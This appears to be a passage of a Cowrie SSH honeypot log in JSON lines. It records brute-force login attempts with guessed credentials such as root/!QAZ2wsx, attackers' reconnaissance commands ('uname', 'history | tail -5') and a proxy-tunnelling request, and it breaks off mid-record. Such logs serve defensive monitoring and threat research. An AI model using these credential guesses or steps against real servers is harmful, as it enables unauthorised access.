{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:30:29.170725Z","src_ip":"185.93.89.7","session":"4ae130301e77"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:30:29.187820Z","src_ip":"185.93.89.7","session":"4ae130301e77"}
{"eventid":"cowrie.login.failed","username":"index","password":"system","message":"login attempt [index/system] failed","sensor":"my-vps","timestamp":"2025-08-28T09:30:29.241594Z","src_ip":"185.93.89.7","session":"4ae130301e77"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:30:30.271998Z","src_ip":"185.93.89.7","session":"4ae130301e77"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":34254,"dst_ip":"1.2.3.4","dst_port":22,"session":"ff9a50592364","protocol":"ssh","message":"New connection: 51.79.164.132:34254 (1.2.3.4:22) [session: ff9a50592364]","sensor":"my-vps","timestamp":"2025-08-28T09:30:46.660903Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:30:46.841245Z","src_ip":"51.79.164.132","session":"ff9a50592364"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:30:47.359493Z","src_ip":"51.79.164.132","session":"ff9a50592364"}
{"eventid":"cowrie.login.success","username":"root","password":"!QAZ2wsx","message":"login attempt [root/!QAZ2wsx] succeeded","sensor":"my-vps","timestamp":"2025-08-28T09:30:48.878863Z","src_ip":"51.79.164.132","session":"ff9a50592364"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T09:30:49.498713Z","src_ip":"51.79.164.132","session":"ff9a50592364"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T09:30:49.499409Z","src_ip":"51.79.164.132","session":"ff9a50592364"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.7","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:30:50.191006Z","src_ip":"51.79.164.132","session":"ff9a50592364"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:30:50.192065Z","src_ip":"51.79.164.132","session":"ff9a50592364"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":32836,"dst_ip":"1.2.3.4","dst_port":22,"session":"fc57b72c8e93","protocol":"ssh","message":"New connection: 185.93.89.7:32836 (1.2.3.4:22) [session: fc57b72c8e93]","sensor":"my-vps","timestamp":"2025-08-28T09:30:53.014359Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:30:53.015273Z","src_ip":"185.93.89.7","session":"fc57b72c8e93"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:30:53.033427Z","src_ip":"185.93.89.7","session":"fc57b72c8e93"}
{"eventid":"cowrie.login.failed","username":"index","password":"qwertyui","message":"login attempt [index/qwertyui] failed","sensor":"my-vps","timestamp":"2025-08-28T09:30:53.071320Z","src_ip":"185.93.89.7","session":"fc57b72c8e93"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:30:54.092409Z","src_ip":"185.93.89.7","session":"fc57b72c8e93"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":50882,"dst_ip":"1.2.3.4","dst_port":22,"session":"d221a4572d1a","protocol":"ssh","message":"New connection: 51.79.164.132:50882 (1.2.3.4:22) [session: d221a4572d1a]","sensor":"my-vps","timestamp":"2025-08-28T09:31:13.116995Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:31:13.328021Z","src_ip":"51.79.164.132","session":"d221a4572d1a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:31:13.329628Z","src_ip":"51.79.164.132","session":"d221a4572d1a"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin","message":"login attempt [admin/admin] failed","sensor":"my-vps","timestamp":"2025-08-28T09:31:15.944944Z","src_ip":"51.79.164.132","session":"d221a4572d1a"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":36644,"dst_ip":"1.2.3.4","dst_port":22,"session":"4d6a7d0cd3aa","protocol":"ssh","message":"New connection: 185.93.89.7:36644 (1.2.3.4:22) [session: 4d6a7d0cd3aa]","sensor":"my-vps","timestamp":"2025-08-28T09:31:16.604830Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:31:16.606105Z","src_ip":"185.93.89.7","session":"4d6a7d0cd3aa"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:31:16.624365Z","src_ip":"185.93.89.7","session":"4d6a7d0cd3aa"}
{"eventid":"cowrie.login.failed","username":"index","password":"asd123","message":"login attempt [index/asd123] failed","sensor":"my-vps","timestamp":"2025-08-28T09:31:16.663770Z","src_ip":"185.93.89.7","session":"4d6a7d0cd3aa"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:31:17.137582Z","src_ip":"51.79.164.132","session":"d221a4572d1a"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:31:17.684066Z","src_ip":"185.93.89.7","session":"4d6a7d0cd3aa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51121,"dst_ip":"1.2.3.4","dst_port":22,"session":"5af6f616d0fc","protocol":"ssh","message":"New connection: 212.227.235.229:51121 (1.2.3.4:22) [session: 5af6f616d0fc]","sensor":"my-vps","timestamp":"2025-08-28T09:31:20.320581Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:31:20.615148Z","src_ip":"212.227.235.229","session":"5af6f616d0fc"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:31:21.081871Z","src_ip":"212.227.235.229","session":"5af6f616d0fc"}
{"eventid":"cowrie.login.success","username":"root","password":"096896","message":"login attempt [root/096896] succeeded","sensor":"my-vps","timestamp":"2025-08-28T09:31:22.806106Z","src_ip":"212.227.235.229","session":"5af6f616d0fc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T09:31:24.259130Z","src_ip":"212.227.235.229","session":"5af6f616d0fc"}
{"eventid":"cowrie.command.input","input":"history | tail -5","message":"CMD: history | tail -5","sensor":"my-vps","timestamp":"2025-08-28T09:31:24.259914Z","src_ip":"212.227.235.229","session":"5af6f616d0fc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3b6409aecd4af0f82f5af0e783a29453ca4bca7e2fda26224a53d480b46ae991","size":28,"shasum":"3b6409aecd4af0f82f5af0e783a29453ca4bca7e2fda26224a53d480b46ae991","duplicate":true,"duration":"0.6","message":"Closing TTY Log: var/lib/cowrie/tty/3b6409aecd4af0f82f5af0e783a29453ca4bca7e2fda26224a53d480b46ae991 after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:31:24.853634Z","src_ip":"212.227.235.229","session":"5af6f616d0fc"}
{"eventid":"cowrie.session.closed","duration":"4.9","message":"Connection lost after 4.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:31:25.177624Z","src_ip":"212.227.235.229","session":"5af6f616d0fc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":13841,"dst_ip":"1.2.3.4","dst_port":22,"session":"526dce8d7fbc","protocol":"ssh","message":"New connection: 212.227.125.160:13841 (1.2.3.4:22) [session: 526dce8d7fbc]","sensor":"my-vps","timestamp":"2025-08-28T09:31:28.233713Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:31:28.234865Z","src_ip":"212.227.125.160","session":"526dce8d7fbc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":14118,"dst_ip":"1.2.3.4","dst_port":22,"session":"d2ca51dc84cf","protocol":"ssh","message":"New connection: 212.227.125.160:14118 (1.2.3.4:22) [session: d2ca51dc84cf]","sensor":"my-vps","timestamp":"2025-08-28T09:31:28.348276Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:31:28.348996Z","src_ip":"212.227.125.160","session":"d2ca51dc84cf"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-28T09:31:28.462570Z","src_ip":"212.227.125.160","session":"d2ca51dc84cf"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T09:31:28.803955Z","src_ip":"212.227.125.160","session":"d2ca51dc84cf"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-28T09:31:28.918866Z","session":"d2ca51dc84cf"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":60668,"dst_ip":"1.2.3.4","dst_port":22,"session":"abbbd7268bc0","protocol":"ssh","message":"New connection: 51.79.164.132:60668 (1.2.3.4:22) [session: abbbd7268bc0]","sensor":"my-vps","timestamp":"2025-08-28T09:31:39.352170Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:31:39.556183Z","src_ip":"51.79.164.132","session":"abbbd7268bc0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:31:39.556907Z","src_ip":"51.79.164.132","session":"abbbd7268bc0"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":54236,"dst_ip":"1.2.3.4","dst_port":22,"session":"140fe048c841","protocol":"ssh","message":"New connection: 185.93.89.7:54236 (1.2.3.4:22) [session: 140fe048c841]","sensor":"my-vps","timestamp":"2025-08-28T09:31:41.507088Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:31:41.508143Z","src_ip":"185.93.89.7","session":"140fe048c841"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128",